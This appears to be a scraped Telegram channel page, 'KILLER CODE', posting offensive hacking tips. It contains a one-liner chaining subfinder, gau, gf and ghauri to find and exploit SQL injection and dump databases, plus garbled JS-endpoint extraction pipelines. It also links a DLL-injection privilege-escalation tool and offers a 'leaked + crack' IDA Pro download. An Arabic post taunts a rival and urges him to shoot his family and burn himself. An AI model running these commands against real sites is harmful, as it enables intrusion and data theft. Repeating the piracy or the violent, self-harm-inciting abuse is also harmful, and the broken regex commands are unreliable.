KILLER CODE
Ir al canal en Telegram
Sin datos
Suscriptores
-224 horas
-187 días
+25330 días
Archivo de publicaciones
subfinder -d example.com -all -silent | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
echo example.com | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities
✅https://github.com/rootDR/ex-param
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt👾The Art of Fuzzing: A Deep Dive into Software Security
Chapter 1 – Fuzzing Introduction
Chapter 2 – Static & Dynamic Fuzzing
Chapter 3 – Symbolic & Concolic Execution
Chapter 4 – Python Fuzzing
Chapter 5 – Go Fuzzing
Chapter 6 – Rust Fuzzing
Chapter 7 – Java Fuzzing
Chapter 8 – Web Fuzzing
الله و كمان بيتفاعل مع رسالتي ده طلع عاجبه الوضع و طلع انه حلمه يتهان مني طب و الله مش محقق حلمه و هخليها حسرة في قلبه و مش ههينه هخليه ذي الكلب يعوي 🤣🤣
و انا عارف انه قاعد في قناتي أربعة وعشرين ساعه لانه مش وراه حاجة غير بلاك الي حارقه و الي شاغل تفكيره فأكيد هيقري كلامي و هيتحسر يا عيني 😂😂
الفاشل عديم الكرامة لو يموت برضك مش هيعرف يعمل حاجة أقصى أحلامه انه يعيش نفس الحياة الي اعيشها لو الكرامة كانت امتحان كان هو فشل في الامتحان من اول سؤال و لو كانت الكرامة مصدر رزق كان هو أفقر الناس انسان ختم الفشل و انعدام الشرف لدرجة اني مش مصدق اني اشوف حد بالقذارة دي و الله نصيحتي ليه انه يمسك شوتجان و يفنش اهله واحد واحد و يجيب بنزين و يصبه على نفسه ولا فالح في اي شئ فالح يعرف بلاك راح فين و جه من فين و ياريت عرف يمسك حاجة و ياريت عرف يثبت حاجة لا حد عارفه او مهتم بكلامه ولا حتى في حد صدقه كل الي يشوف كلامه عنه يجي له فضول يعرف مين بلاك ده فيجي عندي و يتعرف على و نبقى اصحاب 😂😂😂😂
🖼️ Manipulating Shim and Office for Code Injection
Office Injector - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM.
Shim Injector - Writes an undocumented shim data structure into the memory of another process that causes apphelp.dll to apply the “Inject Dll” fix on the process without registering a new SDB file on the system, or even writing such file to disk.
DefCon Presentation
🔗 Source:
https://github.com/deepinstinct/ShimMe
#windows #office #rpc #inject #lpe
New IDA Pro 9 leaked + crack
https://out5.hex-rays.com/beta90_6ba923/idademo_90_x64win.exe https://out5.hex-rays.com/beta90_6ba923/idademo_90_x64linux.run https://out5.hex-rays.com/beta90_6ba923/idademo_90_armmac.app.zip https://out5.hex-rays.com/beta90_6ba923/idademo_90_x64mac.app.zip
